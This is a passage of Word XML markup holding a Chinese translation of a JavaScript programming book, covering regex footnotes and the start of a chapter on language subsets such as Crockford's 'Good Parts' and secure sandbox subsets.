      <w:r>
        <w:t>irefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 5</w:t>
      </w:r>
      <w:r>
        <w:t>都遵循</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>标准，以至于</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>都没有很好地遵循</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>标准，不过在这个问题上反而处理对了。很明显</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的规范更符合开发者的期望。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>Cyrillic</w:t>
      </w:r>
      <w:r>
        <w:t>字符是一种斯拉夫语字母，请参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Cyrillic_alphabet</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>除了在字符类（方括号）中，</w:t>
      </w:r>
      <w:r>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t>匹配退格符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>原书此处有误，</w:t>
      </w:r>
      <w:r>
        <w:t>“(?=”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“)”</w:t>
      </w:r>
      <w:r>
        <w:t>之间的表达式只用于指定一个位置</w:t>
      </w:r>
      <w:r>
        <w:t>，它是零宽的，这里提到的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>断言</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>通常也称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>零宽断言</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>其实通过</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>也可以实现运行时动态创建正则表达式，但不推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>这里所说的任意位置实际上是由</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>的值决定的，如果</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>的值不为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，必定会对新开始的正则表达式匹配检索造成不确定的影响。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="Di_11Zhang__JavaScriptDe_Zi_Ji_He_Kuo_Zh"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的子集和扩展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止，本书参照</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的标准规范完整地讨论了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>这门官方语言。从现在起，本章将开始讨论</w:t>
      </w:r>
      <w:r>
        <w:t>JavaS</w:t>
      </w:r>
      <w:r>
        <w:t>cript</w:t>
      </w:r>
      <w:r>
        <w:t>的子集和超集。其中子集的定义大部分都是出于安全考虑，只有使用这门语言的一个安全的子集编写脚本，才能让代码执行得更安全、更稳定，比如如何更安全地执行一段由不可信第三方提供的广告代码。</w:t>
      </w:r>
      <w:r>
        <w:t>11.1</w:t>
      </w:r>
      <w:r>
        <w:t>节会对这个子集做简要介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>标准是</w:t>
      </w:r>
      <w:r>
        <w:t>1999</w:t>
      </w:r>
      <w:r>
        <w:t>年颁布的，十年后，也就是</w:t>
      </w:r>
      <w:r>
        <w:t>2009</w:t>
      </w:r>
      <w:r>
        <w:t>年才更新到了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的作者</w:t>
      </w:r>
      <w:r>
        <w:t>Brendan Eich</w:t>
      </w:r>
      <w:r>
        <w:t>在这十年间不断地改进这门语言（</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准规范是允许对其做任何扩充的），同时，伴随着</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>项目的推进，在</w:t>
      </w:r>
      <w:r>
        <w:t>Fi</w:t>
      </w:r>
      <w:r>
        <w:t>refox 1.0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t>版本中分别发布了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1.6</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1.7</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1.8</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>1.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>版本。这些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的扩展版本中的很多新特性已经融入到</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，还有很多特性依然是非标准的，但这些特性将有很大一部分会融入到</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>的将来版本中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>是基于一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>，因此</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器也可以支持这些扩展特性。由</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>开发的另一个基于</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引</w:t>
      </w:r>
      <w:r>
        <w:t>擎</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>12.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）也支持大部分</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>扩展特性。但由于这些语言特性是非标准的，本章内容对于那些需要调试浏览器兼容性的开发者来说可能帮助不大。我们在本章对它们作必要的讲述是基于几点考虑：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们的确很强大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们有可能在未来成为标准。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们可用来写</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>扩展插件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们可用在服务器端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程，只要运行环境是基于</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎即可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在简单介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言的子集之后，本章后面会开始介绍语言的扩展部分。由于这些扩</w:t>
      </w:r>
      <w:r>
        <w:t>展毕竟不是标准，因此这里只是一个指南形式的描述，并不像本书其他章节那样系统完整地介绍语言特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="11_1_JavaScriptDe_Zi_Ji_"/>
      <w:r>
        <w:t>11.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的子集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数语言都会定义它们的子集，用以更安全地执行不可信的第三方代码。这里有一个很有趣的子集，定义这个子集的原因有些特殊。我们首先来看这个有趣的子集，然后再讨论安全的语言子集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="11_1_1_Jing_Hua_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>11.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　精华</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Douglas Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>曾经写过一本很薄的书《</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript:The Good </w:t>
      </w:r>
      <w:r>
        <w:t>Parts</w:t>
      </w:r>
      <w:r>
        <w:t>》（</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>出版社），专门介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中值得发扬光大的精华部分。这个语言子集的目标是简化这门语言，规避掉语言中的怪癖、缺陷部分，最终使编程更轻松、程序更健壮。</w:t>
      </w:r>
      <w:r>
        <w:t>Douglas Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>是这样介绍它的动机的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数编程语言都有精华部分和鸡肋部分，我发现如果只使用精华部分而避免使用鸡肋部分，我可以成为一名更好的程序员。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>提炼出的子集部分不包含</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句以及</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。他提倡使用函数定义表达式而不是函数定义语句来定义函数。该子集要</w:t>
      </w:r>
      <w:r>
        <w:t>求：循环体和条件分支都使用花括号括起来，它不允许在循环体和条件分支中只包含一条语句时省略花括号，任何语句只要不是以花括号结束都应当使用分号做结尾。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个子集中并未包含逗号运算符、位运算符以及</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“--”</w:t>
      </w:r>
      <w:r>
        <w:t>。也不包含</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“!=”</w:t>
      </w:r>
      <w:r>
        <w:t>，因为用这两个运算符进行比较时会涉及类型转换，这里更推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并不包含块级作用域，</w:t>
      </w:r>
      <w:r>
        <w:t>Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>为我们提炼出的子集部分对</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句做了限制，</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句只能出现在函数体的顶</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>部，并要求程序员将函数内所有的变量声明写在一条单独的</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:t>语句中，作为函数体的第一条语句。在子集中禁止使用全局变量，但这个限制只是编程约定，并不是真正的语言上的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>写过一个在线代码质量检测工具</w:t>
      </w:r>
      <w:r>
        <w:t>JSLint</w:t>
      </w:r>
      <w:r>
        <w:t>，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>http://jslint.com</w:t>
      </w:r>
      <w:r>
        <w:t>访问这个工具。这个工具提供了很多选项用来增强代码的一致性检查。除了能确保代码使用了子集推荐的特性之外，</w:t>
      </w:r>
      <w:r>
        <w:t>JSLint</w:t>
      </w:r>
      <w:r>
        <w:t>工具还对编码风格做了一些强制约定，比如合理的缩进等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>的那本书出版时，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的严格模式还没有出来，然而</w:t>
      </w:r>
      <w:r>
        <w:t>Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>所提取出的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt“</w:t>
      </w:r>
      <w:r>
        <w:t>鸡肋部分</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>中有很大一部分在严格模式中同样做了限制。随着</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>标准的广泛采用，</w:t>
      </w:r>
      <w:r>
        <w:t>JSLint</w:t>
      </w:r>
      <w:r>
        <w:t>工具要求在选中</w:t>
      </w:r>
      <w:r>
        <w:t>"The Good Parts"</w:t>
      </w:r>
      <w:r>
        <w:t>选项时程序中必须包含一条</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="11_1_2_Zi_Ji_De_An_Quan_Xing_"/>
      <w:r>
        <w:t>11.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　子集的安全性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>精华部分</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的一个语言子集可以设计出更具美感的程序并提升程序员的开发效率。这里将要讨论的是一个更大的子集，这个大子集的设计目的是能在一个容器或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>沙箱</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>中更安全地运行不可信的第三方</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。所有能破坏这个沙箱并影响全局执行环境的语言特性和</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>在这个安</w:t>
      </w:r>
      <w:r>
        <w:t>全子集中都是禁止的。每个子集</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>都带有一个静态的检查器，可以对代码进行解析检查以确保代码是符合子集规范的。由于这个检查器的检验规则比较严格，因此有一些沙箱系统定义了范围更广、校验更松散的子集，并增加了一个代码转换的步骤，用以将针对更大子集的代码检验转换为针对更小子集的代码检验，同时在对代码的静态分析不能确保代码安全性的情况下增加了运行时的检查。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码静态地通过安全检查，必须移除一些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>特性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·eval()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数在任何安全子集里都是禁止使用的，因为它们可以执行任意代码，而且</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>无法对这些代码做静态分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，因为函数（在非严格模式中）可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>访问全局对象。而沙箱系统的一个重要目的就是阻止对全局对象的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句，因为</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句增加了静态代码检查的难度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>禁止使用某些全局变量。在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，浏览器窗口对象可以当做全局对象，但也具有双重身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>，因此代码中不能</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>有对</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的引用。同</w:t>
      </w:r>
      <w:r>
        <w:t>样地，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了可以用来操控整个页面内容的方法。将对</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>的控制权交给一段不受信任的代码会有很多隐患。安全子集提供了两种不同的方法来处理类似</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>这类全局对象。第一种方法是，沙箱完全禁掉它们，并定义一组自定义</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>用以对分配给它的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面做有限制的访问。第二种方法，在沙箱代码所运行的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
